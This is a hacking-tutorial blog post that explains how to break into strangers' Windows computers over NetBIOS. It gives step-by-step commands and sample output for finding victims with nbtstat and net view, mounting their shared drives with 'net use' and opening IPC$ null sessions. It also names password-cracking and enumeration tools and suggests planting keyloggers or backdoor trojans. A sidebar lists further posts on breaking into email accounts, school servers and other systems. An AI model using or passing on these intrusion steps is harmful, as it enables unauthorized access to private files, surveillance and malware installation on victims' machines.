I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS
A BRIEF LESSON ON NETBIOS
NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-
Name of the computer
Username
Domain
Computer Name
and many others.
Like any other service it also works on a port . It has been assigned a port number 139.
THE NBTSTAT COMMAND
You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get
c:\windows>
If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.
Now lets play with the NBTSTAT command.
If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.
c:\windows>nbtstat/?
If you want to get the NetBIOS information of your computer type the following command
c:\windows>nbtstat -a 127.0.0.1
This command will list the NetBIOS information. A typical example
NetBIOS Remote Machine Name Table
Name Number Type Usage
==========================================================================
workgroup 00 G Domain Name
my_computer 03 U Messenger Service
myusername 03 U Messenger Service
MAC Address = 00-02-44-14-23-E6
Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.
This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.
If you want to get the NetBIOS names of a remote computer, the command is
c:\windows>nbtstat -a ipaddress
Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command
NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.
c:\windows>nbtstat -a 203.195.136.156
WHAT YOU NEED TO HACK
All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.
TYPES OF ATTACKS
We can launch two types of attack on the remote computer having NetBIOS.
1. Reading/Writing to a remote computer system
2. Denial of Service
Searching for a victim
You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.
Lets Hack -Part 1 Remotely reading/writing to a victiim's computer
Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .
The command that you will use to view the NetBIOS name is
c:\windows>nbtstat -a 203.195.136.156
Let suppose that the output comes out to be
NetBIOS Remote Machine Name Table
Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing.
-------------------------------------------------------------------------------------------------------------------------------------------------------------
NOTE - If you do not get this number there are two possibilities
1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .
2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.
---------------------------------------------------------------------------------------------------------
Now our next step would be to view the drive or folders the victim is sharing.
We will use command
c:\windows>net view \\203.195.136.156
Let suppose we get the following output
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
CDISK Disk
The command completed successfully.
"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
HP-6L Print
"Print " shows that the victim is sharing a printer named as HP-6L
If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.
Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.
Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .
Lets do it.
We will use the NET command to do our work .
Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command
c:\windows>net use k: \\203.195.136.156\CDISK
You may replace k letter by any other letter.
If the command is successful we will get the confirmation - The command was completed successfullly
The command was completed successfully
Now just double click on the My Computer icon on your desktop and you will be a happy hacker!
We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!
Cracking Share passwords
Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -
Windows 95
Windows 98
Windows Me
Using IPC$ to hack Windows NT,2000,XP
Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.
IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.
We hackers use IPC$ in this way
c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""
You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.
Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.
Penetrating in to the victim's computer
Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...
But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission
Lets Hack - Part 2 Denial of service attack
This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.
Subscribe to:
Post Comments (Atom)
Labels
...etc)
*Big Bang experiment hacked
100 Excellent Free WordPress Themes
100 Keyboard shortcuts (Windows)
117 Run Commands In Windows Xp
12 Sites To Create Cartoon Characters of Yourself
13 Computer keyboards you’ve never seen before
160+ Mega Web Design Tutorial Roundup
17 Useful iPhone Applications You Should Install
20 best ebooks sites
20 Best Websites To Download Free E-Books
25 (Free) 3D Modeling Applications You Should Not Miss
25 Websites To Have Fun With Your Photos
26 Sites That Pay You to Blog
27 Must-Have Starter Kits For Web Designers
30+ New Useful WordPress Tricks
35+ Essential Web Design Resources on Best Practice
40 Creative and Inspiring Website Backgrounds Techniques
42 Free Online Magazines for Designers
50 Amazing Wildlife
50 Best CSS Web Design Resources for Webmasters
50 Greatest Computer Workstation (PC/Mac) Setups
50 Useful New jQuery Techniques and Tutorials
60 Excellent Free 3D Model Websites
60 Most Beautiful Apple (Mac OS X Leopard) Wallpapers
7 Design Resources for iPhone Developers
75 Top Best Design Resources of 2008
9 Alternative Ways To Access Blocked Sites
99 Facts about Guyz(Very True)...
A-Z of Free Photoshop Plugins and Filters
Activate header in Yahoo/Gmail/Hotmail and find IP information
Adding Items to the Start Button
Administrator Password Hack
Airtel Free Mms
AirTel Free tricks
airtel hack
All Software links
Alone (In a Crowded Room
Animal Wallpapers
Automatic Administrator Login
Automatically Kill Programs At Shutdown
AVI
Best Color Tools For Web Designers
Best Way To Lock Your Folder Without Any Programs
BIO DATA OF A MODERN GIRL
Break into email accounts
Bypass windows validation
C-C++ projects with source codes
Call anyone from any persons number free......
CDMA Phones Secret Codes
Cellphone hacks
chat with command prompt
Cheat codes for default games in windows xp-2
Check Your Mobile -Software / IMEI / SimLock Unlock code
Clear BIOS password
Convert web site 2 wap site
Cool Futuristic/Concept Gadgets That Really Inspire
Crack CD protection
Create a new fake virus to spoof Antivirus
Create a Shortcut to Lock Your Computer
Create Multiple Websites Under 1 Shared-Hosting Account
d:
Disable USB Drives
Disabling Drives in My Computer
Disabling My Computer
Display legal notice on startup
DivX
DOTNET SITES
download any video YOUTUBE GOOGLE VIDEOS PAKREEL METACA
download youtube videos to ur computer
Downloads and online resources for computer stuff
Drop-Down Menu: 30+ Useful Scripts to Enhance Header Navigation
Dwnld FREE NOKIA INTERNET RADIO:
e:
Ebooks
Edit ur PC Window setting
electronics
Fake hacking-spam
Free gprs settings for any operator network
free SMS
Free sms sites
FTP: Free Clients and Alternative Connection Methods
Giveaway: Free Hosting Accounts
Google Hacking Database (GHDB)
Google Offices (Googleplex) Around The World [Photos]
GPRS
GSM Secret Codes
Hack [Sify
hack using NetBIOS ( hacking someones remote computer)
Hack yahoo through tro messenger
Hacker tools
Hacking computers through telnet
Hacking in schools and colleges
Hacking internet Cafe
Hacking Websites
Hacks
High Flier
Home
How To Access Blocked Web Sites
How To Become A Hacker
How to change ur IP on networks
How to convert Tivo
How to get ip address of person u r chatting with on msn messenger
How to hack through winamp
How to Hide the drives(c:
How to Lock a Folder Using Notepad
How to make keygens
How To Shut Down All Pc(s) On the Network
How to Solve Access Denied Deleting Files Folders
HTML Table Building: 30+ Beautiful Examples and Useful Javascripts
Important SITES list
Increasing options in add/remove programs
Ip address explanation continued
ip locator .......find the location of a ip
jokes
Learn How To Hack | Tutorials On How To Hack | How To Hack
LEARN SIMPLE VIRUS PROgRAM USING ...NOTEPAD....
Macro Photography: 50+ Remarkable Bits of Life We Overlook
make a fake page of ur own for any website
McAfee Total Protection
Menu Delays
MMS
Mobile tricks
More in email hacking
Motorola Secret Codes
MPEG
MPEG4
No Shutdown
Nokia secret codes
Notepad time and date trick
Opening a DOS Window to either the Drive or Directory in Explorer
Other smart ways to Bypass the Windows genuine advantage Validation
Others] Speed Upto 10 MBPS [Beam Cable Hack]
Predictions of our world
Protect urself.know what hackers do
PSP etc
RADIO ONLINE
RealMedia videos and many more to iPod
Recycle Bin Edits
Reliance
RESUMES
Samsung Secret Codes
School/cllg server hacking......hack ur school server
search engines and mails
SEARCH files in RAPIDSHARE.com
SECURITY
Send SMS to anyone from any persons number
Shutdown someones comp over msn and all
SITES
Sites for free sms (PC to Mobile)
SOME USEFULL IP TRICKS N TIPS
Sony Ericsson Secret Codes
Speed up Mozilla Firefox about 3-30x Faster
speed-up-menu-display.html'
Speeding Up Share Viewing
Spy phishing
Start Your Computer in a Second
technology
TEMPLATES
Tips and Techniques
To make folder delete protected
Top Paying CPM Advertisement Network
tricks mobile
Tutorial: How to hack a site
tutorials
Ultimate Guide To Web Optimization (Tips Best Practices)
Use any USB stick As Ram Advanced search
USEFULL LINKS
Vedic Maths
Vehicles - sQuba (World's First Swimming Car)
Very official love letter
Virus
Virus made in c++
Want 2Trace Location of Enemies Mobile no.?
WANT FREE USERNAME AND PASSWORD OF ANY SITE?????
want to see your system hardware information
Watch Any Movie In Paint (100%) Working
Watch FREE Live Internet TV ***
What is neuclear deal????
When I'm with you
Windows keyboard shortcuts you never knew existed very helpful
Windows Media Player Tricks
WMV
Xvid
Yahoo messenger hack
Yahoo webcam hacking (1000% working)
You Are My Everything
Your Mobile Doesnt Support all Indian Lanuages
No comments:
Post a Comment